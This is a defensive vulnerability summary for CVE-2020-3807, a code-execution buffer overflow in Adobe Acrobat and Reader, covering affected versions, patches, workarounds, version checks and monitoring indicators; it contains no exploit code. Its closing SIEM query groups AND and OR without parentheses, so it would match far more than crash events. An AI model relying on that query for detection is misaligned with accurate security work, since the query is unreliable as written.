CVE-2020-3807
📋 TL;DR
This CVE describes a critical buffer overflow vulnerability in Adobe Acrobat and Reader that allows attackers to execute arbitrary code on affected systems. Successful exploitation occurs when a user opens a malicious PDF file. All users running vulnerable versions of Adobe Acrobat or Reader are affected.
💻 Affected Systems
- Adobe Acrobat DC
- Adobe Acrobat Reader DC
- Adobe Acrobat 2017
- Adobe Acrobat Reader 2017
- Adobe Acrobat 2015
- Adobe Acrobat Reader 2015
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise with attacker gaining full control over the victim's computer, potentially leading to data theft, ransomware deployment, or lateral movement within the network.
Likely Case
Malicious PDF files delivered via phishing emails or malicious websites lead to system compromise of individual users, potentially resulting in credential theft, data exfiltration, or malware installation.
If Mitigated
With proper security controls like application whitelisting, network segmentation, and user awareness training, impact is limited to isolated incidents that can be contained and remediated quickly.
🎯 Exploit Status
Exploitation requires user interaction (opening a malicious PDF) but no authentication. Given the high CVSS score and widespread deployment of Adobe Reader, weaponization is likely even without public PoC.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Acrobat DC/Reader DC: 2020.006.20042 or later; Acrobat 2017/Reader 2017: 2017.011.30166 or later; Acrobat 2015/Reader 2015: 2015.006.30518 or later
Vendor Advisory: https://helpx.adobe.com/security/products/acrobat/apsb20-13.html
Restart Required: Yes
Instructions:
1. Open Adobe Acrobat or Reader. 2. Go to Help > Check for Updates. 3. Follow prompts to download and install available updates. 4. Restart the application when prompted. 5. Verify the update by checking Help > About Adobe Acrobat/Reader.
🔧 Temporary Workarounds
Disable JavaScript in Adobe Reader
allDisabling JavaScript can prevent exploitation of many PDF-based vulnerabilities, though it may break legitimate PDF functionality.
Edit > Preferences > JavaScript > Uncheck 'Enable Acrobat JavaScript'
Use Protected View
allConfigure Adobe Reader to open all PDFs in Protected View to limit potential damage from malicious files.
Edit > Preferences > Security (Enhanced) > Check 'Enable Protected View at startup' and 'Enable Enhanced Security'
🧯 If You Can't Patch
- Implement application control/whitelisting to prevent execution of unauthorized code
- Use network segmentation to isolate vulnerable systems and limit lateral movement
🔍 How to Verify
Check if Vulnerable:
Open Adobe Acrobat/Reader, go to Help > About Adobe Acrobat/Reader, and compare version number against affected ranges.Check Version:
On Windows: wmic product where "name like 'Adobe%Acrobat%'" get version; On macOS: /usr/bin/mdls -name kMDItemVersion /Applications/Adobe\ Acrobat\ Reader\ DC.appVerify Fix Applied:
After updating, verify version is 2020.006.20042 or later (DC), 2017.011.30166 or later (2017), or 2015.006.30518 or later (2015).📡 Detection & Monitoring
Log Indicators:
- Application crashes of Adobe Acrobat/Reader with unusual error codes
- Unusual process creation from Adobe processes
- Suspicious file access patterns from Adobe processes
Network Indicators:
- Outbound connections from Adobe processes to suspicious IPs/domains
- Unusual DNS queries from systems running Adobe Reader
SIEM Query:
source="*adobe*" AND (event_id=1000 OR event_id=1001) AND process_name="AcroRd32.exe" OR process_name="Acrobat.exe"